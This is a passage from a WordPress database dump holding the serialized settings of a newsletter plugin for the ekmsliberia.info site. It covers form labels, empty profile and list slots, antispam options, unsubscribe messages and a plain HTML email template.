policy\";s:14:\"privacy_status\";i:1;s:11:\"privacy_url\";s:48:\"https://ekmsliberia.info/cookies-privacy-policy/\";s:18:\"privacy_use_wp_url\";i:0;s:9:\"subscribe\";s:12:\"Get Updates!\";s:12:\"title_female\";s:3:\"Ms.\";s:10:\"title_male\";s:3:\"Mr.\";s:10:\"title_none\";s:4:\"Dear\";s:8:\"sex_male\";s:3:\"Man\";s:10:\"sex_female\";s:5:\"Woman\";s:8:\"sex_none\";s:13:\"Not specified\";s:16:\"profile_1_status\";s:1:\"0\";s:9:\"profile_1\";s:0:\"\";s:14:\"profile_1_type\";s:4:\"text\";s:21:\"profile_1_placeholder\";s:0:\"\";s:15:\"profile_1_rules\";s:1:\"0\";s:17:\"profile_1_options\";s:0:\"\";s:16:\"profile_2_status\";s:1:\"0\";s:9:\"profile_2\";s:0:\"\";s:14:\"profile_2_type\";s:4:\"text\";s:21:\"profile_2_placeholder\";s:0:\"\";s:15:\"profile_2_rules\";s:1:\"0\";s:17:\"profile_2_options\";s:0:\"\";s:16:\"profile_3_status\";s:1:\"0\";s:9:\"profile_3\";s:0:\"\";s:14:\"profile_3_type\";s:4:\"text\";s:21:\"profile_3_placeholder\";s:0:\"\";s:15:\"profile_3_rules\";s:1:\"0\";s:17:\"profile_3_options\";s:0:\"\";s:16:\"profile_4_status\";s:1:\"0\";s:9:\"profile_4\";s:0:\"\";s:14:\"profile_4_type\";s:4:\"text\";s:21:\"profile_4_placeholder\";s:0:\"\";s:15:\"profile_4_rules\";s:1:\"0\";s:17:\"profile_4_options\";s:0:\"\";s:16:\"profile_5_status\";s:1:\"0\";s:9:\"profile_5\";s:0:\"\";s:14:\"profile_5_type\";s:4:\"text\";s:21:\"profile_5_placeholder\";s:0:\"\";s:15:\"profile_5_rules\";s:1:\"0\";s:17:\"profile_5_options\";s:0:\"\";s:16:\"profile_6_status\";s:1:\"0\";s:9:\"profile_6\";s:0:\"\";s:14:\"profile_6_type\";s:4:\"text\";s:21:\"profile_6_placeholder\";s:0:\"\";s:15:\"profile_6_rules\";s:1:\"0\";s:17:\"profile_6_options\";s:0:\"\";s:16:\"profile_7_status\";s:1:\"0\";s:9:\"profile_7\";s:0:\"\";s:14:\"profile_7_type\";s:4:\"text\";s:21:\"profile_7_placeholder\";s:0:\"\";s:15:\"profile_7_rules\";s:1:\"0\";s:17:\"profile_7_options\";s:0:\"\";s:16:\"profile_8_status\";s:1:\"0\";s:9:\"profile_8\";s:0:\"\";s:14:\"profile_8_type\";s:4:\"text\";s:21:\"profile_8_placeholder\";s:0:\"\";s:15:\"profile_8_rules\";s:1:\"0\";s:17:\"profile_8_options\";s:0:\"\";s:16:\"profile_9_status\";s:1:\"0\";s:9:\"profile_9\";s:0:\"\";s:14:\"profile_9_type\";s:4:\"text\";s:21:\"profile_9_placeholder\";s:0:\"\";s:15:\"profile_9_rules\";s:1:\"0\";s:17:\"profile_9_options\";s:0:\"\";s:17:\"profile_10_status\";s:1:\"0\";s:10:\"profile_10\";s:0:\"\";s:15:\"profile_10_type\";s:4:\"text\";s:22:\"profile_10_placeholder\";s:0:\"\";s:16:\"profile_10_rules\";s:1:\"0\";s:18:\"profile_10_options\";s:0:\"\";s:17:\"profile_11_status\";s:1:\"0\";s:10:\"profile_11\";s:0:\"\";s:15:\"profile_11_type\";s:4:\"text\";s:22:\"profile_11_placeholder\";s:0:\"\";s:16:\"profile_11_rules\";s:1:\"0\";s:18:\"profile_11_options\";s:0:\"\";s:17:\"profile_12_status\";s:1:\"0\";s:10:\"profile_12\";s:0:\"\";s:15:\"profile_12_type\";s:4:\"text\";s:22:\"profile_12_placeholder\";s:0:\"\";s:16:\"profile_12_rules\";s:1:\"0\";s:18:\"profile_12_options\";s:0:\"\";s:17:\"profile_13_status\";s:1:\"0\";s:10:\"profile_13\";s:0:\"\";s:15:\"profile_13_type\";s:4:\"text\";s:22:\"profile_13_placeholder\";s:0:\"\";s:16:\"profile_13_rules\";s:1:\"0\";s:18:\"profile_13_options\";s:0:\"\";s:17:\"profile_14_status\";s:1:\"0\";s:10:\"profile_14\";s:0:\"\";s:15:\"profile_14_type\";s:4:\"text\";s:22:\"profile_14_placeholder\";s:0:\"\";s:16:\"profile_14_rules\";s:1:\"0\";s:18:\"profile_14_options\";s:0:\"\";s:17:\"profile_15_status\";s:1:\"0\";s:10:\"profile_15\";s:0:\"\";s:15:\"profile_15_type\";s:4:\"text\";s:22:\"profile_15_placeholder\";s:0:\"\";s:16:\"profile_15_rules\";s:1:\"0\";s:18:\"profile_15_options\";s:0:\"\";s:17:\"profile_16_status\";s:1:\"0\";s:10:\"profile_16\";s:0:\"\";s:15:\"profile_16_type\";s:4:\"text\";s:22:\"profile_16_placeholder\";s:0:\"\";s:16:\"profile_16_rules\";s:1:\"0\";s:18:\"profile_16_options\";s:0:\"\";s:17:\"profile_17_status\";s:1:\"0\";s:10:\"profile_17\";s:0:\"\";s:15:\"profile_17_type\";s:4:\"text\";s:22:\"profile_17_placeholder\";s:0:\"\";s:16:\"profile_17_rules\";s:1:\"0\";s:18:\"profile_17_options\";s:0:\"\";s:17:\"profile_18_status\";s:1:\"0\";s:10:\"profile_18\";s:0:\"\";s:15:\"profile_18_type\";s:4:\"text\";s:22:\"profile_18_placeholder\";s:0:\"\";s:16:\"profile_18_rules\";s:1:\"0\";s:18:\"profile_18_options\";s:0:\"\";s:17:\"profile_19_status\";s:1:\"0\";s:10:\"profile_19\";s:0:\"\";s:15:\"profile_19_type\";s:4:\"text\";s:22:\"profile_19_placeholder\";s:0:\"\";s:16:\"profile_19_rules\";s:1:\"0\";s:18:\"profile_19_options\";s:0:\"\";s:17:\"profile_20_status\";s:1:\"0\";s:10:\"profile_20\";s:0:\"\";s:15:\"profile_20_type\";s:4:\"text\";s:22:\"profile_20_placeholder\";s:0:\"\";s:16:\"profile_20_rules\";s:1:\"0\";s:18:\"profile_20_options\";s:0:\"\";s:10:\"name_error\";s:16:\"Name is required\";s:13:\"surname_rules\";s:1:\"0\";s:13:\"surname_error\";s:21:\"Last name is required\";s:9:\"sex_rules\";s:1:\"0\";s:13:\"privacy_error\";s:42:\"You must accept the cookies privacy policy\";s:13:\"profile_error\";s:34:\"A mandatory field is not filled in\";s:13:\"list_1_forced\";i:0;s:13:\"list_2_forced\";i:0;s:13:\"list_3_forced\";i:0;s:13:\"list_4_forced\";i:0;s:13:\"list_5_forced\";i:0;s:13:\"list_6_forced\";i:0;s:13:\"list_7_forced\";i:0;s:13:\"list_8_forced\";i:0;s:13:\"list_9_forced\";i:0;s:14:\"list_10_forced\";i:0;s:14:\"list_11_forced\";i:0;s:14:\"list_12_forced\";i:0;s:14:\"list_13_forced\";i:0;s:14:\"list_14_forced\";i:0;s:14:\"list_15_forced\";i:0;s:14:\"list_16_forced\";i:0;s:14:\"list_17_forced\";i:0;s:14:\"list_18_forced\";i:0;s:14:\"list_19_forced\";i:0;s:14:\"list_20_forced\";i:0;s:14:\"list_21_forced\";i:0;s:14:\"list_22_forced\";i:0;s:14:\"list_23_forced\";i:0;s:14:\"list_24_forced\";i:0;s:14:\"list_25_forced\";i:0;s:14:\"list_26_forced\";i:0;s:14:\"list_27_forced\";i:0;s:14:\"list_28_forced\";i:0;s:14:\"list_29_forced\";i:0;s:14:\"list_30_forced\";i:0;s:14:\"list_31_forced\";i:0;s:14:\"list_32_forced\";i:0;s:14:\"list_33_forced\";i:0;s:14:\"list_34_forced\";i:0;s:14:\"list_35_forced\";i:0;s:14:\"list_36_forced\";i:0;s:14:\"list_37_forced\";i:0;s:14:\"list_38_forced\";i:0;s:14:\"list_39_forced\";i:0;s:14:\"list_40_forced\";i:0;}s:37:\"newsletter_profile_first_install_time\";s:10:\"1575385711\";s:23:\"newsletter_profile_main\";a:8:{s:4:\"text\";s:188:\"{profile_form}\n    <p>If you change your email address, a confirmation email will be sent to activate it.</p>\n    <p><a href=\"{unsubscription_confirm_url}\">Cancel your subscription</a></p>\";s:13:\"email_changed\";s:81:\"Your email has been changed, an activation email has been sent with instructions.\";s:5:\"error\";s:42:\"Your email is not valid or already in use.\";s:10:\"save_label\";s:4:\"Save\";s:13:\"privacy_label\";s:21:\"Read our privacy note\";s:5:\"saved\";s:14:\"Profile saved.\";s:18:\"export_newsletters\";i:0;s:3:\"url\";s:0:\"\";}s:26:\"newsletter_profile_version\";s:5:\"1.1.0\";s:21:\"newsletter_statistics\";a:1:{s:3:\"key\";s:32:\"3e00f6b7ad514de0ee66dbc9f56651eb\";}s:40:\"newsletter_statistics_first_install_time\";s:10:\"1575385711\";s:29:\"newsletter_statistics_version\";s:5:\"1.3.2\";s:31:\"newsletter_subscription_antibot\";a:6:{s:12:\"ip_blacklist\";a:0:{}s:17:\"address_blacklist\";a:0:{}s:9:\"antiflood\";s:2:\"30\";s:7:\"akismet\";s:1:\"0\";s:7:\"captcha\";s:1:\"1\";s:8:\"disabled\";s:1:\"0\";}s:42:\"newsletter_subscription_first_install_time\";s:10:\"1575385711\";s:29:\"newsletter_subscription_lists\";a:240:{s:6:\"list_1\";s:0:\"\";s:13:\"list_1_status\";i:0;s:14:\"list_1_checked\";i:0;s:13:\"list_1_forced\";i:0;s:19:\"list_1_subscription\";i:0;s:14:\"list_1_profile\";i:0;s:6:\"list_2\";s:0:\"\";s:13:\"list_2_status\";i:0;s:14:\"list_2_checked\";i:0;s:13:\"list_2_forced\";i:0;s:19:\"list_2_subscription\";i:0;s:14:\"list_2_profile\";i:0;s:6:\"list_3\";s:0:\"\";s:13:\"list_3_status\";i:0;s:14:\"list_3_checked\";i:0;s:13:\"list_3_forced\";i:0;s:19:\"list_3_subscription\";i:0;s:14:\"list_3_profile\";i:0;s:6:\"list_4\";s:0:\"\";s:13:\"list_4_status\";i:0;s:14:\"list_4_checked\";i:0;s:13:\"list_4_forced\";i:0;s:19:\"list_4_subscription\";i:0;s:14:\"list_4_profile\";i:0;s:6:\"list_5\";s:0:\"\";s:13:\"list_5_status\";i:0;s:14:\"list_5_checked\";i:0;s:13:\"list_5_forced\";i:0;s:19:\"list_5_subscription\";i:0;s:14:\"list_5_profile\";i:0;s:6:\"list_6\";s:0:\"\";s:13:\"list_6_status\";i:0;s:14:\"list_6_checked\";i:0;s:13:\"list_6_forced\";i:0;s:19:\"list_6_subscription\";i:0;s:14:\"list_6_profile\";i:0;s:6:\"list_7\";s:0:\"\";s:13:\"list_7_status\";i:0;s:14:\"list_7_checked\";i:0;s:13:\"list_7_forced\";i:0;s:19:\"list_7_subscription\";i:0;s:14:\"list_7_profile\";i:0;s:6:\"list_8\";s:0:\"\";s:13:\"list_8_status\";i:0;s:14:\"list_8_checked\";i:0;s:13:\"list_8_forced\";i:0;s:19:\"list_8_subscription\";i:0;s:14:\"list_8_profile\";i:0;s:6:\"list_9\";s:0:\"\";s:13:\"list_9_status\";i:0;s:14:\"list_9_checked\";i:0;s:13:\"list_9_forced\";i:0;s:19:\"list_9_subscription\";i:0;s:14:\"list_9_profile\";i:0;s:7:\"list_10\";s:0:\"\";s:14:\"list_10_status\";i:0;s:15:\"list_10_checked\";i:0;s:14:\"list_10_forced\";i:0;s:20:\"list_10_subscription\";i:0;s:15:\"list_10_profile\";i:0;s:7:\"list_11\";s:0:\"\";s:14:\"list_11_status\";i:0;s:15:\"list_11_checked\";i:0;s:14:\"list_11_forced\";i:0;s:20:\"list_11_subscription\";i:0;s:15:\"list_11_profile\";i:0;s:7:\"list_12\";s:0:\"\";s:14:\"list_12_status\";i:0;s:15:\"list_12_checked\";i:0;s:14:\"list_12_forced\";i:0;s:20:\"list_12_subscription\";i:0;s:15:\"list_12_profile\";i:0;s:7:\"list_13\";s:0:\"\";s:14:\"list_13_status\";i:0;s:15:\"list_13_checked\";i:0;s:14:\"list_13_forced\";i:0;s:20:\"list_13_subscription\";i:0;s:15:\"list_13_profile\";i:0;s:7:\"list_14\";s:0:\"\";s:14:\"list_14_status\";i:0;s:15:\"list_14_checked\";i:0;s:14:\"list_14_forced\";i:0;s:20:\"list_14_subscription\";i:0;s:15:\"list_14_profile\";i:0;s:7:\"list_15\";s:0:\"\";s:14:\"list_15_status\";i:0;s:15:\"list_15_checked\";i:0;s:14:\"list_15_forced\";i:0;s:20:\"list_15_subscription\";i:0;s:15:\"list_15_profile\";i:0;s:7:\"list_16\";s:0:\"\";s:14:\"list_16_status\";i:0;s:15:\"list_16_checked\";i:0;s:14:\"list_16_forced\";i:0;s:20:\"list_16_subscription\";i:0;s:15:\"list_16_profile\";i:0;s:7:\"list_17\";s:0:\"\";s:14:\"list_17_status\";i:0;s:15:\"list_17_checked\";i:0;s:14:\"list_17_forced\";i:0;s:20:\"list_17_subscription\";i:0;s:15:\"list_17_profile\";i:0;s:7:\"list_18\";s:0:\"\";s:14:\"list_18_status\";i:0;s:15:\"list_18_checked\";i:0;s:14:\"list_18_forced\";i:0;s:20:\"list_18_subscription\";i:0;s:15:\"list_18_profile\";i:0;s:7:\"list_19\";s:0:\"\";s:14:\"list_19_status\";i:0;s:15:\"list_19_checked\";i:0;s:14:\"list_19_forced\";i:0;s:20:\"list_19_subscription\";i:0;s:15:\"list_19_profile\";i:0;s:7:\"list_20\";s:0:\"\";s:14:\"list_20_status\";i:0;s:15:\"list_20_checked\";i:0;s:14:\"list_20_forced\";i:0;s:20:\"list_20_subscription\";i:0;s:15:\"list_20_profile\";i:0;s:7:\"list_21\";s:0:\"\";s:14:\"list_21_status\";i:0;s:15:\"list_21_checked\";i:0;s:14:\"list_21_forced\";i:0;s:20:\"list_21_subscription\";i:0;s:15:\"list_21_profile\";i:0;s:7:\"list_22\";s:0:\"\";s:14:\"list_22_status\";i:0;s:15:\"list_22_checked\";i:0;s:14:\"list_22_forced\";i:0;s:20:\"list_22_subscription\";i:0;s:15:\"list_22_profile\";i:0;s:7:\"list_23\";s:0:\"\";s:14:\"list_23_status\";i:0;s:15:\"list_23_checked\";i:0;s:14:\"list_23_forced\";i:0;s:20:\"list_23_subscription\";i:0;s:15:\"list_23_profile\";i:0;s:7:\"list_24\";s:0:\"\";s:14:\"list_24_status\";i:0;s:15:\"list_24_checked\";i:0;s:14:\"list_24_forced\";i:0;s:20:\"list_24_subscription\";i:0;s:15:\"list_24_profile\";i:0;s:7:\"list_25\";s:0:\"\";s:14:\"list_25_status\";i:0;s:15:\"list_25_checked\";i:0;s:14:\"list_25_forced\";i:0;s:20:\"list_25_subscription\";i:0;s:15:\"list_25_profile\";i:0;s:7:\"list_26\";s:0:\"\";s:14:\"list_26_status\";i:0;s:15:\"list_26_checked\";i:0;s:14:\"list_26_forced\";i:0;s:20:\"list_26_subscription\";i:0;s:15:\"list_26_profile\";i:0;s:7:\"list_27\";s:0:\"\";s:14:\"list_27_status\";i:0;s:15:\"list_27_checked\";i:0;s:14:\"list_27_forced\";i:0;s:20:\"list_27_subscription\";i:0;s:15:\"list_27_profile\";i:0;s:7:\"list_28\";s:0:\"\";s:14:\"list_28_status\";i:0;s:15:\"list_28_checked\";i:0;s:14:\"list_28_forced\";i:0;s:20:\"list_28_subscription\";i:0;s:15:\"list_28_profile\";i:0;s:7:\"list_29\";s:0:\"\";s:14:\"list_29_status\";i:0;s:15:\"list_29_checked\";i:0;s:14:\"list_29_forced\";i:0;s:20:\"list_29_subscription\";i:0;s:15:\"list_29_profile\";i:0;s:7:\"list_30\";s:0:\"\";s:14:\"list_30_status\";i:0;s:15:\"list_30_checked\";i:0;s:14:\"list_30_forced\";i:0;s:20:\"list_30_subscription\";i:0;s:15:\"list_30_profile\";i:0;s:7:\"list_31\";s:0:\"\";s:14:\"list_31_status\";i:0;s:15:\"list_31_checked\";i:0;s:14:\"list_31_forced\";i:0;s:20:\"list_31_subscription\";i:0;s:15:\"list_31_profile\";i:0;s:7:\"list_32\";s:0:\"\";s:14:\"list_32_status\";i:0;s:15:\"list_32_checked\";i:0;s:14:\"list_32_forced\";i:0;s:20:\"list_32_subscription\";i:0;s:15:\"list_32_profile\";i:0;s:7:\"list_33\";s:0:\"\";s:14:\"list_33_status\";i:0;s:15:\"list_33_checked\";i:0;s:14:\"list_33_forced\";i:0;s:20:\"list_33_subscription\";i:0;s:15:\"list_33_profile\";i:0;s:7:\"list_34\";s:0:\"\";s:14:\"list_34_status\";i:0;s:15:\"list_34_checked\";i:0;s:14:\"list_34_forced\";i:0;s:20:\"list_34_subscription\";i:0;s:15:\"list_34_profile\";i:0;s:7:\"list_35\";s:0:\"\";s:14:\"list_35_status\";i:0;s:15:\"list_35_checked\";i:0;s:14:\"list_35_forced\";i:0;s:20:\"list_35_subscription\";i:0;s:15:\"list_35_profile\";i:0;s:7:\"list_36\";s:0:\"\";s:14:\"list_36_status\";i:0;s:15:\"list_36_checked\";i:0;s:14:\"list_36_forced\";i:0;s:20:\"list_36_subscription\";i:0;s:15:\"list_36_profile\";i:0;s:7:\"list_37\";s:0:\"\";s:14:\"list_37_status\";i:0;s:15:\"list_37_checked\";i:0;s:14:\"list_37_forced\";i:0;s:20:\"list_37_subscription\";i:0;s:15:\"list_37_profile\";i:0;s:7:\"list_38\";s:0:\"\";s:14:\"list_38_status\";i:0;s:15:\"list_38_checked\";i:0;s:14:\"list_38_forced\";i:0;s:20:\"list_38_subscription\";i:0;s:15:\"list_38_profile\";i:0;s:7:\"list_39\";s:0:\"\";s:14:\"list_39_status\";i:0;s:15:\"list_39_checked\";i:0;s:14:\"list_39_forced\";i:0;s:20:\"list_39_subscription\";i:0;s:15:\"list_39_profile\";i:0;s:7:\"list_40\";s:0:\"\";s:14:\"list_40_status\";i:0;s:15:\"list_40_checked\";i:0;s:14:\"list_40_forced\";i:0;s:20:\"list_40_subscription\";i:0;s:15:\"list_40_profile\";i:0;}s:32:\"newsletter_subscription_template\";a:1:{s:8:\"template\";s:2365:\"<!DOCTYPE html>\n<html>\n    <head>\n        <!-- General styles, not used by all email clients -->\n        <style type=\"text/css\" media=\"all\">\n            a {\n                text-decoration: none;\n                color: #0088cc;\n            }\n            hr {\n                border-top: 1px solid #999;\n            }\n        </style>\n    </head>\n\n    <!-- KEEP THE LAYOUT SIMPLE: THOSE ARE SERVICE MESSAGES. -->\n    <body style=\"margin: 0; padding: 0;\">\n\n        <!-- Top title with dark background -->\n        <table style=\"background-color: #444; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\n            <tr>\n                <td style=\"padding: 20px; text-align: center; font-family: sans-serif; color: #fff; font-size: 28px\">\n                    {blog_title}\n                </td>\n            </tr>\n        </table>\n\n        <!-- Main table 100% wide with background color #eee -->    \n        <table style=\"background-color: #eee; width: 100%;\">\n            <tr>\n                <td align=\"center\" style=\"padding: 15px;\">\n\n                    <!-- Content table with backgdound color #fff, width 500px -->\n                    <table style=\"background-color: #fff; max-width: 600px; width: 100%; border: 1px solid #ddd;\">\n                        <tr>\n                            <td style=\"padding: 15px; color: #333; font-size: 16px; font-family: sans-serif\">\n                                <!-- The \"message\" tag below is replaced with one of confirmation, welcome or goodbye messages -->\n                                <!-- Messages content can be configured on Newsletter List Building panels --> \n\n                                {message}\n\n                                <hr>\n                                <!-- Signature if not already added to single messages (surround with <p>) -->\n                                <p>\n                                    <small>\n                                        <a href=\"{blog_url}\">{blog_url}</a><br>\n                                        {company_name}<br>\n                                        {company_address}\n                                    </small>\n                                </p>\n                                \n\n                            </td>\n                        </tr>\n                    </table>\n\n                </td>\n            </tr>\n        </table>\n\n    </body>\n</html>\";}s:31:\"newsletter_subscription_version\";s:5:\"2.2.7\";s:17:\"newsletter_system\";a:0:{}s:36:\"newsletter_system_first_install_time\";s:10:\"1636982768\";s:25:\"newsletter_system_version\";s:5:\"1.1.0\";s:25:\"newsletter_unsubscription\";a:8:{s:16:\"unsubscribe_text\";s:103:\"<p>Please confirm you want to unsubscribe <a href=\"{unsubscription_confirm_url}\">clicking here</a>.</p>\";s:10:\"error_text\";s:99:\"<p>Subscriber not found, it probably has already been removed. No further actions are required.</p>\";s:17:\"unsubscribed_text\";s:124:\"<p>Your subscription has been deleted. If that was an error you can <a href=\"{reactivate_url}\">subscribe again here</a>.</p>\";s:20:\"unsubscribed_subject\";s:7:\"Goodbye\";s:20:\"unsubscribed_message\";s:87:\"<p>This message confirms that you have unsubscribed from our newsletter. Thank you.</p>\";s:16:\"reactivated_text\";s:46:\"<p>Your subscription has been reactivated.</p>\";s:6:\"notify\";s:0:\"\";s:12:\"notify_email\";s:0:\"\";}s:44:\"newsletter_unsubscription_first_install_time\";s:10:\"1575385711\";s:33:\"newsletter_unsubscription_version\";s:5:\"1.0.4\";s:16:\"newsletter_users\";a:0:{}s:35:\"newsletter_users_first_install_time\";s:10:\"1575385711\";s:23:\"newsletter_users_search\";a:4:{s:11:\"search_text\";s:0:\"\";s:13:\"search_status\";s:0:\"\";s:11:\"search_list\";s:0:\"\";s:11:\"search_page\";i:0;}s:24:\"newsletter_users_version\";s:5:\"1.3.0\";}','no'),(3206568,'newsletter_antispam','a:6:{s:12:\"ip_blacklist\";a:0:{}s:17:\"address_blacklist\";a:0:{}s:9:\"antiflood\";s:2:\"30\";s:7:\"akismet\";s:1:\"0\";s:7:\"captcha\";s:1:\"1\";s:8:\"disabled\";s:1:\"0\";}','no'),(3206569,'newsletter_form','a:68:{s:5:\"email\";s:5:\"Email\";s:11:\"email_error\";s:28:\"Email address is not correct\";s:4:\"name\";s:23:\"First name or full name\";s:11:\"name_status\";i:2;s:10:\"name_rules\";s:1:\"0\";s:7:\"surname\";s:9:\"Last name\";s:14:\"surname_status\";s:1:\"0\";s:10:\"sex_status\";s:1:\"0\";s:3:\"sex\";s:3:\"I\'m\";s:7:\"privacy\";s:52:\"By continuing, you accept the cookies privacy policy\";s:14:\"privacy_status\";i:1;s:11:\"privacy_url\";s:48:\"https://ekmsliberia.info/cookies-privacy-policy/\";s:18:\"privacy_use_wp_url\";i:0;s:9:\"subscribe\";s:12:\"Get Updates!\";s:12:\"title_female\";s:3:\"Ms.\";s:10:\"title_male\";s:3:\"Mr.\";s:10:\"title_none\";s:4:\"Dear\";s:8:\"sex_male\";s:3:\"Man\";s:10:\"sex_female\";s:5:\"Woman\";s:8:\"sex_none\";s:13:\"Not specified\";s:10:\"name_error\";s:16:\"Name is required\";s:13:\"surname_rules\";s:1:\"0\";s:13:\"surname_error\";s:21:\"Last name is required\";s:9:\"sex_rules\";s:1:\"0\";s:13:\"privacy_error\";s:42:\"You must accept the cookies privacy policy\";s:13:\"list_1_forced\";i:0;s:13:\"list_2_forced\";i:0;s:13:\"list_3_forced\";i:0;s:13:\"list_4_forced\";i:0;s:13:\"list_5_forced\";i:0;s:13:\"list_6_forced\";i:0;s:13:\"list_7_forced\";i:0;s:13:\"list_8_forced\";i:0;s:13:\"list_9_forced\";i:0;s:14:\"list_10_forced\";i:0;s:14:\"list_11_forced\";i:0;s:14:\"list_12_forced\";i:0;s:14:\"list_13_forced\";i:0;s:14:\"list_14_forced\";i:0;s:14:\"list_15_forced\";i:0;s:14:\"list_16_forced\";i:0;s:14:\"list_17_forced\";i:0;s:14:\"list_18_forced\";i:0;s:14:\"list_19_forced\";i:0;s:14:\"list_20_forced\";i:0;s:14:\"list_21_forced\";i:0;s:14:\"list_22_forced\";i:0;s:14:\"list_23_forced\";i:0;s:14:\"list_24_forced\";i:0;s:14:\"list_25_forced\";i:0;s:14:\"list_26_forced\";i:0;s:14:\"list_27_forced\";i:0;s:14:\"list_28_forced\";i:0;s:14:\"list_29_forced\";i:0;s:14:\"list_30_forced\";i:0;s:14:\"list_31_forced\";i:0;s:14:\"list_32_forced\";i:0;s:14:\"list_33_forced\";i:0;s:14:\"list_34_forced\";i:0;s:14:\"list_35_forced\";i:0;s:14:\"list_36_forced\";i:0;s:14:\"list_37_forced\";i:0;s:14:\"list_38_forced\";i:0;s:14:\"list_39_forced\";i:0;s:14:\"list_40_forced\";i:0;s:12:\"customfields\";a:0:{}s:5:\"lists\";a:0:{}s:13:\"lists_checked\";a:0:{}}','yes'),(3206570,'newsletter_customfields','a:121:{s:16:\"profile_1_status\";s:1:\"0\";s:9:\"profile_1\";s:0:\"\";s:14:\"profile_1_type\";s:4:\"text\";s:21:\"profile_1_placeholder\";s:0:\"\";s:15:\"profile_1_rules\";s:1:\"0\";s:17:\"profile_1_options\";s:0:\"\";s:16:\"profile_2_status\";s:1:\"0\";s:9:\"profile_2\";s:0:\"\";s:14:\"profile_2_type\";s:4:\"text\";s:21:\"profile_2_placeholder\";s:0:\"\";s:15:\"profile_2_rules\";s:1:\"0\";s:17:\"profile_2_options\";s:0:\"\";s:16:\"profile_3_status\";s:1:\"0\";s:9:\"profile_3\";s:0:\"\";s:14:\"profile_3_type\";s:4:\"text\";s:21:\"profile_3_placeholder\";s:0:\"\";s:15:\"profile_3_rules\";s:1:\"0\";s:17:\"profile_3_options\";s:0:\"\";s:16:\"profile_4_status\";s:1:\"0\";s:9:\"profile_4\";s:0:\"\";s:14:\"profile_4_type\";s:4:\"text\";s:21:\"profile_4_placeholder\";s:0:\"\";s:15:\"profile_4_rules\";s:1:\"0\";s:17:\"profile_4_options\";s:0:\"\";s:16:\"profile_5_status\";s:1:\"0\";s:9:\"profile_5\";s:0:\"\";s:14:\"profile_5_type\";s:4:\"text\";s:21:\"profile_5_placeholder\";s:0:\"\";s:15:\"profile_5_rules\";s:1:\"0\";s:17:\"profile_5_options\";s:0:\"\";s:16:\"profile_6_status\";s:1:\"0\";s:9:\"profile_6\";s:0:\"\";s:14:\"profile_6_type\";s:4:\"text\";s:21:\"profile_6_placeholder\";s:0:\"\";s:15:\"profile_6_rules\";s:1:\"0\";s:17:\"profile_6_options\";s:0:\"\";s:16:\"profile_7_status\";s:1:\"0\";s:9:\"profile_7\";s:0:\"\";s:14:\"profile_7_type\";s:4:\"text\";s:21:\"profile_7_placeholder\";s:0:\"\";s:15:\"profile_7_rules\";s:1:\"0\";s:17:\"profile_7_options\";s:0:\"\";s:16:\"profile_8_status\";s:1:\"0\";s:9:\"profile_8\";s:0:\"\";s:14:\"profile_8_type\";s:4:\"text\";s:21:\"profile_8_placeholder\";s:0:\"\";s:15:\"profile_8_rules\";s:1:\"0\";s:17:\"profile_8_options\";s:0:\"\";s:16:\"profile_9_status\";s:1:\"0\";s:9:\"profile_9\";s:0:\"\";s:14:\"profile_9_type\";s:4:\"text\";s:21:\"profile_9_placeholder\";s:0:\"\";s:15:\"profile_9_rules\";s:1:\"0\";s:17:\"profile_9_options\";s:0:\"\";s:17:\"profile_10_status\";s:1:\"0\";s:10:\"profile_10\";s:0:\"\";s:15:\"profile_10_type\";s:4:\"text\";s:22:\"profile_10_placeholder\";s:0:\"\";s:16:\"profile_10_rules\";s:1:\"0\";s:18:\"profile_10_options\";s:0:\"\";s:17:\"profile_11_status\";s:1:\"0\";s:10:\"profile_11\";s:0:\"\";s:15:\"profile_11_type\";s:4:\"text\";s:22:\"profile_11_placeholder\";s:0:\"\";s:16:\"profile_11_rules\";s:1:\"0\";s:18:\"profile_11_options\";s:0:\"\";s:17:\"profile_12_status\";s:1:\"0\";s:10:\"profile_12\";s:0:\"\";s:15:\"profile_12_type\";s:4:\"text\";s:22:\"profile_12_placeholder\";s:0:\"\";s:16:\"profile_12_rules\";s:1:\"0\";s:18:\"profile_12_options\";s:0:\"\";s:17:\"profile_13_status\";s:1:\"0\";s:10:\"profile_13\";s:0:\"\";s:15:\"profile_13_type\";s:4:\"text\";s:22:\"profile_13_placeholder\";s:0:\"\";s:16:\"profile_13_rules\";s:1:\"0\";s:18:\"profile_13_options\";s:0:\"\";s:17:\"profile_14_status\";s:1:\"0\";s:10:\"profile_14\";s:0:\"\";s:15:\"profile_14_type\";s:4:\"text\";s:22:\"profile_14_placeholder\";s:0:\"\";s:16:\"profile_14_rules\";s:1:\"0\";s:18:\"profile_14_options\";s:0:\"\";s:17:\"profile_15_status\";s:1:\"0\";s:10:\"profile_15\";s:0:\"\";s:15:\"profile_15_type\";s:4:\"text\";s:22:\"profile_15_placeholder\";s:0:\"\";s:16:\"profile_15_rules\";s:1:\"0\";s:18:\"profile_15_options\";s:0:\"\";s:17:\"profile_16_status\";s:1:\"0\";s:10:\"profile_16\";s:0:\"\";s:15:\"profile_16_type\";s:4:\"text\";s:22:\"profile_16_placeholder\";s:0:\"\";s:16:\"profile_16_rules\";s:1:\"0\";s:18:\"profile_16_options\";s:0:\"\";s:17:\"profile_17_status\";s:1:\"0\";s:10:\"profile_17\";s:0:\"\";s:15:\"profile_17_type\";s:4:\"text\";s:22:\"profile_17_placeholder\";s:0:\"\";s:16:\"profile_17_rules\";s:1:\"0\";s:18:\"profile_17_options\";s:0:\"\";s:17:\"profile_18_status\";s:1:\"0\";s:10:\"profile_18\";s:0:\"\";s:15:\"profile_18_type\";s:4:\"text\";s:22:\"profile_18_placeholder\";s:0:\"\";s:16:\"profile_18_rules\";s:1:\"0\";s:18:\"profile_18_options\";s:0:\"\";s:17:\"profile_19_status\";s:1:\"0\";s:10:\"profile_19\";s:0:\"\";s:15:\"profile_19_type\";s:4:\"text\";s:22:\"profile_19_placeholder\";s:0:\"\";s:16:\"profile_19_rules\";s:1:\"0\";s:18:\"profile_19_options\";s:0:\"\";s:17:\"profile_20_status\";s:1:\"0\";s:10:\"profile_20\";s:0:\"\";s:15:\"profile_20_type\";s:4:\"text\";s:22:\"profile_20_placeholder\";s:0:\"\";s:16:\"profile_20_rules\";s:1:\"0\";s:18:\"profile_20_options\";s:0:\"\";s:13:\"profile_error\";s:34:\"A mandatory field is not filled in\";}','yes'),(3206571,'newsletter_subscription','a:18:{s:14:\"noconfirmation\";s:1:\"1\";s:12:\"notify_email\";s:24:\"contact@ekmsliberia.info\";s:8:\"multiple\";s:1:\"0\";s:6:\"notify\";s:1:\"0\";s:10:\"error_text\";s:102:\"<p>You 